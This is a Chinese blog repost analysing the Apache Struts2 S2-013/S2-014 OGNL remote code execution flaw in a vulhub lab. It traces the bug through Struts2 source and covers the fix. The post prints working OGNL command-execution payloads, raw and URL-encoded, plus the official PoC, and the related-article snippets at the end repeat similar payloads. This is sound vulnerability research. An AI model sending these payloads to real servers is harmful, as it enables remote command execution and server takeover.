S2-013 远程代码执行漏洞检测与利用

最新推荐文章于 2024-12-30 10:30:00 发布
转载 最新推荐文章于 2024-12-30 10:30:00 发布 · 3.3k 阅读 · 4

本文深入分析Struts2框架中的S2-013漏洞,探讨其触发机制及修复过程。通过环境搭建、payload构造、代码跟踪,揭示OGNL表达式执行的根本原因。

前言

S2-014是对于S2-013修复不完整的造成的漏洞,会在漏洞分析中提到,所以文本的主要分析的还是S2-013

而且在分析的时候,发现参考网上资料时对于漏洞触发逻辑的一些错误 至少目前我自己是那么认为的:)

漏洞环境根据vulhub修改而来,环境地址 https://github.com/kingkaki/Struts2-Vulenv,感兴趣的师傅可以一起分析下

若有疏漏,还望多多指教

漏洞信息

https://cwiki.apache.org/confluence/display/WW/S2-013

struts2的标签中 <s:a> 和 <s:url> 都有一个 includeParams 属性,可以设置成如下值

  1. none - URL中包含任何参数(默认)
  2. get - 仅包含URL中的GET参数
  3. all - 在URL中包含GET和POST参数

includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。

此时<s:a> 或<s:url>尝试去解析原始请求参数时,会导致OGNL表达式的执行

漏洞利用

不妨先来看下index.jsp中标签是怎么设置的

<p><s:a id="link1" action="link" includeParams="all">"s:a" tag</s:a></p>
<p><s:url id="link2" action="link" includeParams="all">"s:url" tag</s:url></p>

然后来测试一下最简单payload ${1+1}(记得编码提交 :)

http://localhost:8888/link.action?a=%24%7B1%2b1%7D

就可以看到返回的url中的参数已经被解析成了2

然后命令执行的payload

${#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('calc').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(+new java.lang.String(#d)),#out.close()}

编码后提交

http://localhost:8888/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27calc%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%2bnew%20java.lang.String%28%23d%29%29%2C%23out.close%28%29%7D

漏洞分析

网上关于S2-013的分析将它的形成归结于

这里我先说明两点

  • 我分析时的漏洞环境种xwork-core的版本是2.2.3,DefaultUrlHelper.class中的类全部在UrlHelper.class,但是代码逻辑并没有更改
  • 至于漏洞究竟是哪里触发的,可以根据弹出计算器在哪弹出来确定究竟是哪里触发的

我们可以从一开始的struts2-core-2.2.3.jar!/org/apache/struts2/components/Anchor.class:64中这两句开始关注

this.urlRenderer.beforeRenderUrl(this.urlProvider);
this.urlRenderer.renderUrl(sw, this.urlProvider);

第一句是返回url之前的一些处理,第二句是返回url,从第一句开始打下断点,然后跟进去

果然还是来到了struts2-core-2.2.3.jar!/org/apache/struts2/views/util/UrlHelper.class:240parseQueryString方法

但是可以看到,即使过了网上说的这个触发点,计算器依旧没有弹出

String translatedParamValue = translateAndDecode(paramValue);

仅仅是做了一个url编码的过程,然后就返回了,那就继续跟下去吧
最后做完了url的一些预先处理,又回到了之前下断点的下一句

step into进去之后来到了struts2-core-2.2.3.jar!/org/apache/struts2/components/ServletUrlRenderer.class:39

public void renderUrl(Writer writer, UrlProvider urlComponent) {
    String scheme = urlComponent.getHttpServletRequest().getScheme();
    if (urlComponent.getScheme() != null) {
        scheme = urlComponent.getScheme();
    }

    ActionInvocation ai = (ActionInvocation)ActionContext.getContext().get("com.opensymphony.xwork2.ActionContext.actionInvocation");
    String result;
    String _value;
    String var;
    if (urlComponent.getValue() == null && urlComponent.getAction() != null) {
        result = urlComponent.determineActionURL(urlComponent.getAction(), urlComponent.getNamespace(), urlComponent.getMethod(), urlComponent.getHttpServletRequest(), urlComponent.getHttpServletResponse(), urlComponent.getParameters(), scheme, urlComponent.isIncludeContext(), urlComponent.isEncode(), urlComponent.isForceAddSchemeHostAndPort(), urlComponent.isEscapeAmp());
    } else  ...

真正触发漏洞在这一个语句里面,不妨跟进去看一下

来到了struts2-core-2.2.3.jar!/org/apache/struts2/components/Component.class:198

继续跟进最后一行的那个函数

来到了struts2-core-2.2.3.jar!/org/apache/struts2/views/util/UrlHelper.class:49buildUrl函数中

前面做了一些url的处理,添加一些http(s)://之类的前缀,来到后面之后,116行有这样一句

if (escapeAmp) {
    buildParametersString(params, link);
}

这里才是真正的开始build参数

继续step into之后struts2-core-2.2.3.jar!/org/apache/struts2/views/util/UrlHelper.class:139

public static void buildParametersString(Map params, StringBuilder link, String paramSeparator) {
        if (params != null && params.size() > 0) {
            if (link.toString().indexOf("?") == -1) {
                link.append("?");
            } else {
                link.append(paramSeparator);
            }

            Iterator iter = params.entrySet().iterator();

            while(iter.hasNext()) {
                Entry entry = (Entry)iter.next();
                String name = (String)entry.getKey();
                Object value = entry.getValue();
                if (value instanceof Iterable) {
                    Iterator iterator = ((Iterable)value).iterator();

                    while(iterator.hasNext()) {
                        Object paramValue = iterator.next();
                        link.append(buildParameterSubstring(name, paramValue.toString()));
                        if (iterator.hasNext()) {
                            link.append(paramSeparator);
                        }
                    }
                } else if (value instanceof Object[]) {
                    Object[] array = (Object[])((Object[])value);

                    for(int i = 0; i < array.length; ++i) {
                        Object paramValue = array[i];
                        link.append(buildParameterSubstring(name, paramValue.toString()));
                        .....

取出参数值之后放入了一个数组中,再经过了buildParameterSubstring方法

buildParameterSubstring方法就在这段代码后面

private static String buildParameterSubstring(String name, String value) {
    StringBuilder builder = new StringBuilder();
    builder.append(translateAndEncode(name));
    builder.append('=');
    builder.append(translateAndEncode(value));
    return builder.toString();
}

也就是这里,这时url解码之后的translateAndEncode(value)才真正的造成了代码的执行,才弹出了计算器

补一段translateAndEncodetranslateVariable的代码,其实就刚才逻辑分析的下面

public static String translateAndDecode(String input) {
    String translatedInput = translateVariable(input);
    String encoding = getEncodingFromConfiguration();

    try {
        return URLDecoder.decode(translatedInput, encoding);
    } catch (UnsupportedEncodingException var4) {
        LOG.warn("Could not encode URL parameter '" + input + "', returning value un-encoded", new String[0]);
        return translatedInput;
    }
}

private static String translateVariable(String input) {
    ValueStack valueStack = ServletActionContext.getContext().getValueStack();
    String output = TextParseUtil.translateVariables(input, valueStack);
    return output;
}

漏洞修复

在S2-013中用于验证的poc为

%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println('hacked'),#writer.close())}

于是官方就限制了%{(#exp)}格式的OGNL执行,从而造成了S2-014

因为还有%{exp}形式的漏洞,让我们一起看下最终的修补方案

重点自然是放在了DefauiltUrlHlper.class

将之前的translateAndEncode更改成了encode

public String encode(String input) {
    try {
        return URLEncoder.encode(input, this.encoding);
    } catch (UnsupportedEncodingException var3) {
        if (LOG.isWarnEnabled()) {
            LOG.warn("Could not encode URL parameter '#0', returning value un-encoded", new String[]{input});
        }

        return input;
    }
}

只支持简单的url解码

之前触发的点也将函数换成了decode

https://github.com/vulhub/vulhub/tree/master/struts2/s2-013

https://cwiki.apache.org/confluence/display/WW/S2-013

https://cwiki.apache.org/confluence/display/WW/S2-014

S2-013/S2-014 远程代码执行漏洞
玄道的网安博客
06-28 633
前言 S2-014 是对 S2-013 修复的加强,在 S2-013 修复的代码中忽略了 ${ognl_exp} OGNL 表达式执行的方式,因此 S2-014 是对其的补丁加强。 影响版本 2.0.0 - 2.3.14.1 环境搭建 cd vulhub/struts2/s2-013 docker-compose build && docker-compose up -d 漏洞复现 测试是否存在漏洞 http://yourIP:8080/link.action?a=%24{
【vulhub】Struts2 S2-053 远程代码执行漏洞(CVE-2017-12611)
weixin_42884199的博客
12-07 584
前言 Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 影响版本: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10 一、启动靶机 docker-compose build docker-compose up -d 二、验证 payload: %{(223*223
s2-013远程代码执行漏洞
Stephen Wolf
11-18 1351
一、漏洞描述 struts2 标签中 `<s:a>` 和 `<s:url>` 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: 1. none - 链接不包含请求的任意参数值(默认) 2. get - 链接只包含 GET 请求中的参数和其值 3. all - 链接包含 GET 和 POST 所有参数和其值...
0x19.Apache Struts2远程代码执行漏洞(S2-013)
qq_31679787的博客
09-27 476
通过构造payload执行命令; payload:%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20ja...
360众测靶场题库之20-Apache Struts2远程代码执行漏洞(S2-013)
zjl12344的博客
03-07 376
360众测靶场题库
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
JimWu的博客
09-04 2068
Apache Struts2远程代码执行漏洞(S2-013)复现 难易程度:★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理: s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL...
Strust2 远程代码执行漏洞[s2-005]
流水不争先,争的是滔滔不绝
05-29 903
漏洞影响版本【2.0.0 - 2.1.8.1】
在线靶场-墨者-命令执行2-Apache Struts2远程代码执行漏洞(S2-013)复现
weixin_42079912的博客
08-09 678
S2-013漏洞原理:struts2的标签中 < s:a > 和 < s:url > 都有一个 includeParams 属性,可以设置成值none或get或all ,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。此时< s:a > 或< s:url >尝试去解析原始请求参数时,会导致OG...
【Vulfocus解题复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
温氏效应
09-04 4212
漏洞介绍 名称:Struts2 S2-048 远程命令执行漏洞 CVE标识符:CVE-2017-9791 描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型视图的数据交互。 攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。 解题过程 1、打开靶场环境 2、.
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2远程代码执行漏洞分析(S2-013)1
K8_Struts2.3.1.4 s2-013 0day利用工具+动画
05-23
关于2010那洞 我就不说了 2011那个也不说了 (这两成功率 还是顶高的) s2-013 实战 鸡肋 (要不然这工具也不会丢出来了 最好你自己打个环境来测一下 免得你以为工具不能用) 触发条件 1 s2 架构 2 使用了s2的 a标签 3 includeParams=all <s:a includeParams="all">k8team</s:a> 在ie下看到的a标签 和普通html没啥区别 在firefox下会看到 使用了s2 a标签的链接源码是这样的 *.jsp;jsessionid inurl: *.jsp;jsessionid 能不能搞到 纯属看你人品了
[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)
k5664524的博客
01-17 1310
2.3.1.2 之前的 Apache Struts 允许远程攻击者绕过 ParameterInterceptor 类中的安全保护并执行任意命令。
【Vulfocus解题复现】Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 3271
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
vulhub中Struts2-013/Struts2-014 远程代码执行漏洞复现
yougexiaojiuguan的博客
04-06 623
漏洞复现过程的记录
S2-013-RCE(CVE-2013-1966)--vulhub
ccc_9wy的博客
12-30 587
struts2漏洞复现;S2-013;RCE;CVE-2013-1966;OGNL表达式;反弹shell;msfconsole;url编码。
S2-013远程执行代码(CVE-2013-1966)
m0_65150886的博客
01-09 726
Struts2标签库中的url标签和a标签的includeParams这个属性,代表显示请求访问参数的含义,一旦它的值被赋予ALL或者GET或者POST,就会显示具体请求参数内容。按照正常的需求,把参数urlEncode一下也就够了, 问题在于,struts把参数做了OGNL解析,导致OGNL表达式的执行。​ <s:a>includeParams=“all”>Click here.</s:a>,这个是struts2标签库的a标签,该标签会在页面上显示当前URL。控制整个网站甚至控制服务器进一步内网渗透。
Apache Struts2远程代码执行漏洞(S2-013)复现
qq_36933272的博客
09-03 1836
查询原理:s:url和s:a标记都提供includeparams属性。 该属性的主要作用域是了解包含或不包含http://request参数的内容。 INCLUDEParams的允许值为: 无-在URL中不包含任何参数(默认) get-仅在URL中包含get参数 全部-在URL中同时包含get和post参数 包含精心设计的请求参数的请求可用于将任意ognl代码注入堆栈,随后用作URL或标记的请求参...
Struts2 S2-061 远程命令执行漏洞
最新发布
08-05
### Struts2 S2-061 远程代码执行漏洞分析 Apache Struts2 是一个广泛使用的 Java Web 开发框架,其设计基于 MVC 架构,提供了强大的标签库和 OGNL 表达式解析功能。然而,在 2020 年 12 月 8 日,Apache Struts 官方披露了 S2-061 远程代码执行漏洞(CVE-2020-17530),该漏洞源于某些标签属性在特定情况下会进行 OGNL 表达式的二次解析,从而导致 OGNL 注入漏洞。攻击者可以构造恶意请求,远程执行任意命令,甚至控制服务器,造成严重安全风险 [^1]。 漏洞的核心在于 Struts2 对某些标签属性(如 `id`)的值进行两次 OGNL 表达式解析。当这些属性值中包含 `%{x}` 形式的内容,且 `x` 的值由用户控制时,攻击者可以注入恶意的 OGNL 表达式,例如 `%{payload}`,从而触发远程代码执行 [^3]。 S2-061 是对之前 S2-059 漏洞的修复绕过。S2-059 的补丁主要修复了沙盒绕过问题,但未完全阻止 OGNL 表达式的执行。S2-061 利用了 `org.apache.commons.collections.BeanMap` 类,该类存在于 `commons-collections-x.x.jar` 包中,而 Struts2 官方最小依赖包并未包含此库。因此,即使存在支持 OGNL 表达式注入的点,若未使用该依赖包,也无法成功利用 [^3]。 ### 漏洞影响范围 S2-061 漏洞影响使用 Apache Struts2 的多个版本,尤其是在使用某些标签属性时存在 OGNL 表达式二次解析的情况。攻击者可以构造特定的请求,利用该漏洞远程执行任意命令,进而控制服务器,造成数据泄露、系统瘫痪等严重后果 [^1]。 ### 修复方案 1. **升级 Struts2 版本**:官方在漏洞披露后发布了修复版本,建议用户尽快升级到 Struts 2.5.26 或更高版本。新版本中对 OGNL 表达式的解析机制进行了改进,避免了标签属性的二次解析问题 [^1]。 2. **避免使用用户输入构造 OGNL 表达式**:在开发过程中,应避免将用户输入直接拼接到 OGNL 表达式中,尤其是标签属性值。应使用安全的输入验证和输出编码机制,防止恶意输入被当作表达式解析 [^3]。 3. **移除不必要的依赖库**:由于 S2-061 的利用依赖于 `commons-collections` 包,因此建议检查项目依赖,移除不必要的 `commons-collections` 版本,以降低攻击面 [^3]。 4. **启用安全模式(沙盒)**:Struts2 提供了安全模式(沙盒)功能,可以在一定程度上限制 OGNL 表达式的执行。建议在配置文件中启用沙盒模式,并限制表达式的执行权限 [^4]。 5. **部署 Web 应用防火墙(WAF)**:为了进一步增强安全性,建议在前端部署 Web 应用防火墙(WAF),对请求进行过滤和检测,识别并拦截包含 OGNL 表达式的恶意请求 [^2]。 ### 示例代码:安全的输入处理 以下是一个简单的示例,展示如何避免将用户输入直接拼接到 OGNL 表达式中: ```java public class SafeInputAction { private String userInput; public String execute() { // 对用户输入进行过滤和转义 String safeInput = escapeUserInput(userInput); // 将安全处理后的输入用于业务逻辑 // ... return "success"; } private String escapeUserInput(String input) { // 实现输入过滤逻辑,如移除特殊字符 if (input == null) { return null; } return input.replaceAll("[^a-zA-Z0-9]", ""); } // Getter 和 Setter public String getUserInput() { return userInput; } public void setUserInput(String userInput) { this.userInput = userInput; } } ``` 在 JSP 页面中,确保标签属性不直接使用用户输入构造 OGNL 表达式: ```jsp <s:textfield name="userInput" label="请输入内容" /> ``` ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值